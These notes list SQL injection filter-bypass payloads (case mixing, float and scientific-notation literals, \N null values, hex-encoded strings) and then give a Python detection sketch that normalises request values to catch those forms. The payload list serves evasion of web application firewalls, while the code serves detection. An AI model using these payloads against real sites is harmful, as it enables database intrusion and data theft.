Case variation: randomly mix upper and lower case in the keywords, e.g. uNion SElecT

    Floating-point bypass
    select * from users where id=8E0union select 1,2,3,4; -- scientific notation: 8 times 10 to the power of 0
    select * from users where id=8.0union select 1,2,3,4;

    NULL value bypass
    select \N; -- \N represents NULL
    select * from users where id=\Nunion select 1,2,3,\N;
    select * from users where id=\Nunion select 1,2,3,\Nfrom users

    Quote bypass
    When single quotes are filtered, try double quotes

    Hexadecimal bypass
    Convert the string used in the query to hexadecimal (hex); remember to prefix the converted value with "0x"
    select * from users where username='admin';
    select * from users where username=0x61646D696E;
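
Why a keyword filter misses these forms, and how a detection rule can normalise them first: the sketch below is an added example, not part of the original notes. The names `TOKEN`, `NAIVE`, `lex` and `inspect_value` are hypothetical, and the sample inputs are the payload strings listed above.

```python
import re

# Assumption: this approximates how MySQL's lexer ends a numeric, hex or \N
# literal where the literal ends, whether or not whitespace follows it.
TOKEN = re.compile(r"""
    (?P<hex>0x[0-9a-f]+)
  | (?P<num>\d+(?:\.\d*)?(?:e[+-]?\d+)?)
  | (?P<null>(?-i:\\N))
  | (?P<str>'[^']*'|"[^"]*")
  | (?P<word>[a-z_][a-z0-9_]*)
  | (?P<other>\S)
""", re.I | re.X)

NAIVE = re.compile(r"\bunion\s+select\b", re.I)  # typical word-boundary rule


def lex(value):
    """Return (kind, text, start, end) tuples with case and hex normalised."""
    out = []
    for m in TOKEN.finditer(value):
        kind, text = m.lastgroup, m.group()
        if kind == "hex":
            digits = text[2:]
            # MySQL treats an odd digit count as having a leading zero
            digits = digits if len(digits) % 2 == 0 else "0" + digits
            kind, text = "str", bytes.fromhex(digits).decode("latin-1")
        elif kind == "str":
            text = text[1:-1]
        elif kind == "word":
            text = text.lower()
        out.append((kind, text, m.start(), m.end()))
    return out


def inspect_value(value):
    """Findings for one request parameter value, plus its decoded strings."""
    toks = lex(value)
    found = set()
    for (k1, t1, _, end1), (k2, t2, start2, _) in zip(toks, toks[1:]):
        if (k1, t1, k2, t2) == ("word", "union", "word", "select"):
            found.add("union-select")
        if k1 in ("num", "null") and k2 == "word" and end1 == start2:
            found.add("literal-glued-to-keyword")
    return found, [t for k, t, _, _ in toks if k == "str"]


if __name__ == "__main__":
    # Sample values copied from the notes above
    for s in ("8E0union select 1,2,3,4", r"\Nunion select 1,2,3,\N", "0x61646D696E"):
        print(repr(s), bool(NAIVE.search(s)), inspect_value(s))
```

The decoded string list lets an existing string-based rule see `admin` whether it arrived quoted or as a hex literal.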